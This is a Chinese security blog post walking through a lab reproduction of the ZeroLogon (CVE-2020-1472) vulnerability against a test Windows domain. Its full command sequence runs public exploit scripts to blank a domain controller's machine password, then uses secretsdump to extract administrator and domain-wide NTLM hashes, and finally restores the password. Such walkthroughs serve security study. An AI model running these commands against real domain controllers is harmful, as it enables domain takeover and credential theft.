【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

2022年4月7日23:21:27评论415 views字数 2055阅读6分51秒阅读模式

前言漏洞介绍漏洞复现 0. 环境介绍 1. 漏洞检测（同时获取netbios名） 2. 将域控的机器账号密码置空 3. 还原机器用户密码 4. dump域内hash参考链接

前言

本文不涉及漏洞原理分析，仅调研并使用工具。实战中遇到知道怎么利用该漏洞。

漏洞介绍

NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口，被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器，也用于 NTP 响应认证以及更新计算机域密码。

攻击者只需要定位域控主机名及IP，并且可以访问域控，就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。

漏洞复现

0. 环境介绍

# 域
god.org

# 域内主机
Windows 7 
192.168.52.143

# 域控
Windows server 2008
192.168.52.138
主机名：owa
netbios名：owa

在Windows 7上将代理开出来，本地脚本利用

1. 漏洞检测（同时获取netbios名）

检测脚本：https://github.com/WiIs0n/Zerologon_CVE-2020-1472

获取netbios名：

nbtstat -A 192.168.52.138

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

漏洞检测：

python3 check_cve-2020-1472.py --ip 192.168.52.138 --name owa

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

2. 将域控的机器账号密码置空

exp：https://github.com/dirkjanm/CVE-2020-1472

python3 cve-2020-1472-exploit.py owa 192.168.52.138

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

利用机器用户及空密码先获取域管administrator用户的hash，留作后面使用

python3 secretsdump.py -no-pass god.org/"owa$"@192.168.52.138 -history -just-dc-user administrator

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

3. 还原机器用户密码

获取旧的机器密码明文hex

python3 secretsdump.py -no-pass god.org/[email protected] -hashes :b19554738bacdd2e54a67d4e1335bb47

这会输出比较多数据，出现如下数据就可中止

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

利用获得的密码hex还原

python3 restorepassword.py god.org/owa@owa -target-ip 192.168.52.138 -hexpass f733010069c8d921ef4473956561c1aa367b720e51cc64aa2e11aaad3f0b639462120fbbfa10ae2ff93a57f13c7fa3a0faa0baf263f36525a0a1b90082f3c0b32eda13bf043e8e70ebf05bffa22cdfa72f2a58a0b11cc34a2f41843ef1f0334f7b1daba9bb3181644770c39d4f016c3fc41532599e7fb28963f3ed088b85d9b44b1ff548f259e41178531343d1ad7a65225053598d815b58172fde1eddc446001828cd4b28ae8187f745a77c0b28d6bf06fc07376deed1767ebe70676ff9908c96e3dc76a7406a7f0f3a7d65a3037a619b92d1a82930bdbd5595fffd0036912dc1ecd1bd4e28f5eb742a38f0fcd3e7a7

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

校验是否还原成功：

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

4. dump域内hash

随后利用之前获取的域管administrator hash来dump域内用户的ntlm hash

python3 secretsdump.py -no-pass god.org/[email protected] -hashes :b19554738bacdd2e54a67d4e1335bb47 -just-dc-ntlm

【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

ntlm hash为31d6cfe0d16ae931b73c59d7e0c089c0就是空密码，如Guest用户。

参考链接

https://atsud0.me/2020/10/24/CVE-2020-1472%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

https://github.com/WiIs0n/Zerologon_CVE-2020-1472

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/Ridter/Intranet_Penetration_Tips#ZeroLogon

原文始发于微信公众号（信安文摘）：【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Clash Verge rev提权与命令执行分析

【实战】手把手学习写一个MCP服务，获取热榜文章

借助pikachu和DVWA靶场带你走进跨站请求伪造CSRF攻击

揭露导致组织论坛崩溃的简单错误

深度学习基础架构革新？通过梯度近似寻找Normalization的替代品

栈溢出从复现到挖掘-CVE-2018-18708漏洞复现详解

windows rookit防护-权限提升

通过手机和邮箱查真实姓名-币安

常见的信息泄露漏洞挖掘（第二部分）

实战中踩过的坑：我是如何用Ingram搞定摄像头漏洞扫描的

本文由 admin 发表于 2022年4月7日23:21:27
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
【域渗透】- CVE-2020-1472（ZeroLogon）漏洞复现https://cn-sec.com/archives/881569.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码